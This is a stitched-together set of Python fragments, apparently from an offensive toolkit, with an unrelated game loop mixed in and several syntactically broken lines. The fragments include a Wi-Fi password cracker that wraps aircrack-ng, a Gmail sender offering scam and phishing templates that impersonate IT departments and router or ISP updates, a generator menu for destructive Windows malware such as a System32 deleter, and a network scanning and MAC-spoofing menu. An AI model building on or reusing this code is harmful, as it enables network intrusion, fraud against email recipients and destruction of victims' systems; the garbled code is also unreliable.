def startup(): core.clear() # print("[" + green + "+" + rr + "] Starting Mal-editor... ") (we dont need this , to much text on screen ) print("[" + green + "OK" + rr + "] Mal-editor Successfully Started!") core.maleditorlogo() options() whole_file = [] CurrentFileName = "Untitled" if operating_system == "Linux": raw_cmd = read_from_file(os.path.join(sys.path[0], "allcmds.txt")) else: raw_cmd = read_from_file("~/mal-factory/allcmds.txt") try: while True: command = input(red + "Mal" + green + "Editor" + rr + " > ") if command == "99" or command.lower() == "exit" or command.lower( ) == "quit" or command.lower() == "e": raise KeyboardInterrupt elif command.split(" ")[0] == "r": try: whole_file.pop(int(command.split(" ")[1])) except: print("[!] Error trying to remove a line") set_screen(whole_file, CurrentFileName) elif command == "s": try: filename = input(blue + "[*] Save as" + rr + ": ") CurrentFileName = filename savefile = open("~/{}.txt".format(filename), "w") for element in whole_file: savefile.write(element + "\n") savefile.close() except Exception: print(red + "[!] Error saving file as " + filename + rr) print(green + "[ OK ] File saved in ~/{}".format(filename) + rr) elif check_command(command, raw_cmd): whole_file.append(command) set_screen(whole_file, CurrentFileName) else: set_screen(whole_file, CurrentFileName) print(rr + "\n[" + red + "-" + rr + "] Not a valid command: " + command) core.clear() options() show_file(whole_file, CurrentFileName) except KeyboardInterrupt: main.startup() except Exception: print(red + core.bold + "[!] Error in MalEditor") raise
def main(): load_map() drop_gold() update() while True: pressedkey = getch().lower() if pressedkey == 'q': clear() sys.exit(0) elif pressedkey == 'w': go(MOVE['UP']) elif pressedkey == 'a': go(MOVE['LEFT']) elif pressedkey == 's': go(MOVE['DOWN']) elif pressedkey == 'd': go(MOVE['RIGHT'])
def start(): try: core.clear() print("--------------------- \n") os.system("ifconfig") print("\n--------------------- \n") os.system("lanscan interfaces") print("\n--------------------- \n") answer = input( "Please type your wireless adapter's name (Default: wlan0): ") if answer == "": mon = "wlan0" else: mon = answer startup(mon) except KeyboardInterrupt: core.quit()
def menu(): core.clear() time.sleep(0.2) print( + "Initializing...") time.sleep(0.2) print( + "SkyBREAK ver. 1.5.89") print( + "Interf. type " + adapter + "/" + monadapter) time.sleep(0.2) print( + """\n Welcome to skyBREAK. You have the following crackers installed: > WEP > WPA > WPA2""") try: ALLanswer() except KeyboardInterrupt: core.clear() exit()
def clear(): core.clear()
def set_screen(file_to_show): core.clear() options() show_file(file_to_show)
def inbox(username, password): try: print(line) core.gmaillogo() print(line + "\n") while True: answer = input(gmail + core.yellow + " > " + core.rr + "") answer = answer.lower() answer = answer.split(" ") if answer[0] == "help": print("\n-----------\n") print(core.ul + "The Help/Command Menu" + core.rr) print("\nhelp - Opens this help menu") print("reload - Reloads the screen") print("template - See the gmail templates") print( "send <*****@*****.**> - Send an email with your gmail account" ) print( "send <*****@*****.**> -t <template> - Send an email with a pre-set template with your gmail account" ) print("exit - Go back to the homepage") print("\n-----------\n") elif answer[0] == "template" or answer[0] == "templates": print("""\n-----------\n (DO NOT USE THIS FOR ILLEGAL PURPOUSES \n-----------\n NP - (Nigerian Prince) - Send an email asking people to help a helpless rich nigerian prince * REQUIRES FIRSTNAME AND LASTNAME ----------- ITD - (IT Department) - Send an email pretending to be a company's I.T department * REQUIRES LASTNAME, COMPANYNAME ----------- UA - (Unauthorized Access) - Send an email claiming someone's account has reached unauthorized access * REQUIRES FIRSTNAME, LASTNAME, COMPANYNAME, AND USERNAME ----------- RSU - (Router Software Update) - Send an email from a router company asking to download a software update * REQUIRES FIRSTNAME, LASTNAME, COMPANYNAME, ROUTERNAME ----------- ISU - (ISP Software Update) - Send an email from an Internet Service Provider company asking to download a software update * REQUIRES FIRSTNAME, LASTNAME, COMPANYNAME, AND ADDRESS \n-----------\n LME - (Legitimate Malfactory Email) - Send an email expressing that the email contains malware from Malfactory ----------- LMAE - (Legitimate Malware Analysis Email) - Send an email expressing that the email contains malware for analysis \n-----------\n""") elif answer[0] == "exit": main.startup() elif answer[0] == "reload" or answer[0] == "clear": core.clear() print(line) core.gmaillogo() print(line + "\n") elif answer[0] == "send": try: TO = answer[1] SUBJECT = input("\nSubject: ") print("\n--- Type 'quit' to Finish! ---") TEXT = "" x = 1 while True: message = input(str(x) + ": ") if message.lower() == "quit" or message.lower() == "q": print("\n") break TEXT = TEXT + message + "\n" x += 1 BODY = '\r\n'.join([ 'To: %s' % TO, 'From: %s' % username, 'Subject: %s' % SUBJECT, '', TEXT ]) try: server.sendmail(username, [TO], BODY) print('Your email was sent!') except: print( "Error sending mail! Does the recipient's email exist?" ) except: print( "\nError: Could not send email! Your command was incorrectly set.\n" ) elif answer[0] == "send" and answer[3] == "-t": try: TO = answer[1] TEMPLATE = answer[3] SUBJECT = input("\nSubject: ") TEXT = TEMPLATE print(TEMPLATE) try: server.sendmail(username, [TO], BODY) print('Your email was sent!') except: print( "Error sending mail! Does the recipient's email exist?" ) except: print( "\nError: Could not send email! Your command was incorrectly set.\n" ) else: print("\nCommand '" + str(answer) + "' was not found. Please type 'help' for help.\n") except KeyboardInterrupt: main.startup() except: print("\nError: Can't find input.\n") raise
print( + "Please do 'capture <BSSID> <CH>'.") elif answer[0] == "crack": try: BSSID = answer[1] PASSWORDLIST = answer[2] LOCATION = answer[3] os.system("aircrack-ng -a2 -b " + BSSID + " -w " + PASSWORDLIST + " " + LOCATION) except: print( + "Please do 'crack <BSSID> <PASSWORDLIST> <LOCATION>'.") elif answer[0] == "exit": ALLanswer() else: print( fullanswer + " is not a recognized command. Type HELP for more information." ) except KeyboardInterrupt: print( + "") ALLanswer() core.clear() adapter = input("Please type your WiFi Adapter/Network Interface: ") monadapter = input( "Please type your WiFi Adapter/Network Interface In Monitor Mode: ") os.system("sudo airmon-ng start " + adapter) menu()
def update(): clear() print_map_with_items() score() debug()
def __main__(): core.clear() print(Style.BRIGHT + """ \ \ ) __( ( _( )__ __(/ _ \ / __ \ ) () ( ) __( / _ \ | ) ( | _) _) \ | | ) ' / ))__(( '. / | _) ) ' / /___/ )___( )____) )_( |_()_\ \____/ /_( )___( |_()_\ | TheDestroyer is a Framework that Generates Malware that'll | ruin/Destroy a Windows Machine. This is made for Teaching/Educational | Purposes only. I am not responsible for any kind of misuse or Damage | caused by the Program. --> Linux Version - V.1 """ + Style.RESET_ALL) print("[[ USER :: " + core.username() + " ]]") main = input(core.hostname()+"$> ") main = main.lower().strip() if(main == "help"): print(""" Commands : ~ help - Print this Help message ~ list - List available Destroyers ~ setup - Install Required Packages ~ compile - Create a Destroyer ~ exit - Exit """) input(core.star_blue + " Press Enter.") __main__() elif(main == "list"): print("- Ded.exe (Ded.exe) - Command Line Spammer - " + core.check_status("Ded.exe")) print("- Pauser.exe (Pauser.exe) - Input Blocker - " + core.check_status("Pauser.exe")) print("- Persistent Shutdown (ps.exe) - " + core.check_status("ps.exe")) print("- delSystem32 - Obvious (sys32.exe) - " + core.check_status("sys32.exe")) print("- More coming soon.") input(core.star_blue + " Press Enter.") __main__() elif(main == "compile"): core.clear() print(""" [1] Ded.exe - Command Line Spammer [2] Pauser - Input Blocker [3] Persistent Shutdown - Obvious [4] delSystem32 - Obvious [-] More coming soon.. """) print(core.star_blue, "Enter Numeric Value below.") type = input(core.star_bold + " Select Destroyer to Generate : ") if(type == "1"): core.ded() input(core.star_blue + " Press Enter.") __main__() elif(type == "2"): core.pauser() input(core.star_blue + " Press Enter.") __main__() elif(type == "3"): input(core.star_blue + " Press Enter.") __main__() elif(type == "4"): core.sys32() input(core.star_blue + " Press Enter.") __main__() else: input(core.star_blue + " Unidentified.") __main__() elif(main == "setup"): print(core.star_blue, "Will install Required Packages.") os.system("sudo apt-get install mingw-w64") print(core.star_cyan, "Done.") input(core.star_blue + " Press Enter.") __main__() elif(main == "exit"): exit(1) else: input(core.star_blue + " Type help.") __main__()
def startup(mon): core.clear() core.logo() print(r + ul + bo + "Welcome to Airline-Crack!" + r + "\n") print("Your device: " + core.checksystem()) print("Your network interface: " + mon) print("Your original mac address: " + str(mac_id)) os.system("macchanger -s " + mon) print("") print(bo + "Scanning:" + r) print(r + "(" + lc + "1" + r + ")" + " Scan for access points. (Airport)") print(r + "(" + lc + "2" + r + ")" + " Scan IPs and MAC-Addresses/Devices on network (Arp-Scan)") print(r + "(" + lc + "3" + r + ")" + " Scan for packets on a network (Airport + TCPdump)") print(r + "(" + lc + "4" + r + ")" + " Scan an IP Address (Nmap)") print(r + "(" + lc + "5" + r + ")" + " Scan an IP Address (Ipcalc)") print(bo + "MAC Address:" + r) print(r + "(" + lc + "6" + r + ")" + " Become a specific MAC address (Macchanger)") print(r + "(" + lc + "7" + r + ")" + " Become a random MAC address (Macchanger)") print(bo + "Password Cracking:" + r) print(r + "(" + lc + "8" + r + ")" + " Make a password list (Crunch)") print(r + "(" + lc + "9" + r + ")" + " Crack WEP WiFi passwords (Airport + Aircrack)") print(bo + "Extra:" + r) print(r + "(" + lc + "r" + r + ")" + " Reload/Clear the screen") print(r + "(" + lc + "99" + r + ")" + " Exit the tool (CNTRL + C) \n") while True: answer = input(bo + "Airline" + r + "-" + re + "C" + y + "r" + g + "a" + lc + "c" + p + "k" + lc + " > " + r) if answer == "1": wifiscan(mon) if answer == "2": print("") os.system("sudo arp-scan -l") print("") save = input( "Would you like to save these outputs? (Default = No): ") if save == "y" or save == "yes" or save == "Y" or save == "Yes" or save == "YES": savename = input( "What would you like to call the file? (Default: arp-scan): " ) if savename == "": savename = "arp-scan" os.system("sudo arp-scan -l > " + savename + ".log") print("") input("Your output was saved in " + savename + ".log") startup(mon) else: input("\nAlright, your output was not saved.") startup(mon) elif answer == "3": tcpscan(mon) elif answer == "4": print("") IP = input("Please type a specific IP Address: ") print("") os.system("sudo nmap -A " + IP) print("") save = input( "Would you like to save these outputs? (Default = No): ") if save == "y" or save == "yes" or save == "Y" or save == "Yes" or save == "YES": savename = input( "What would you like to call the file? (default: " ) if savename == "": savename = "nmap-" + IP os.system("sudo nmap -A " + IP + " > " + savename + ".log") print("") input("Your output was saved in " + savename + ".log") startup(mon) else: input("\nAlright, your output was not saved.") startup(mon) elif answer == "5": print("") IP = input("Please type a specific IP Address: ") print("") os.system("ipcalc " + IP) print("") save = input( "Would you like to save these outputs? (Default = No): ") if save == "y" or save == "yes" or save == "Y" or save == "Yes" or save == "YES": savename = input( "What would you like to call the file? (default: " ) if savename == "": savename = "ipcalc-" + IP os.system("sudo nmap -A " + IP + " > " + savename + ".log") print("") input("Your output was saved in " + savename + ".log") startup(mon) else: input("\nAlright, your output was not saved.") startup(mon) elif answer == "6": print("") macspoof = input("Please type a specific Mac Address: ") print("") os.system("macchanger -m " + macspoof + " " + mon) print("") input("Finished! Please press {ENTER} to continue...") startup(mon) elif answer == "7": print("") macspoof = os.system("macchanger -r " + mon) print("") elif answer == "8": print("") print("---------------------") crunchname = input( "Please type the name of the password text file (Default: rockyou): " ) if crunchname == "" or crunchname == " ": crunchname = "rockyou" crunchname = crunchname.replace(" ", "_") print("---------------------") print("Ex: ~/Desktop") crunchdir = input( "Type the directory you want the file to be in: ") print("---------------------") crunchmin = input("Minimum # of characters for passwords: ") print("---------------------") crunchmax = input("Maximum # of characters for passwords: ") print("---------------------") print("@ = Any character/number (Wildcard)") print("123... = Any number") print( "Ex: 123456789abcd = characters that can be the # 1-9 or a-d in the alphabet." ) crunchset = input("Enter the setup for passwords: ") print("") os.system("crunch " + crunchmin + " " + crunchmax + " " + crunchset + " -o " + crunchdir + "/" + crunchname + ".txt") print("") input("Finished! Your password file, " + crunchname + ".txt is at " + crunchdir) startup(mon) elif answer == "9": wepCrack(mon) elif answer == "r": startup(mon) elif answer == "99": core.quit() elif answer == "exit": core.quit() else: print("\nThe choice '" + answer + "' was not found. Please pick a choice above. \n")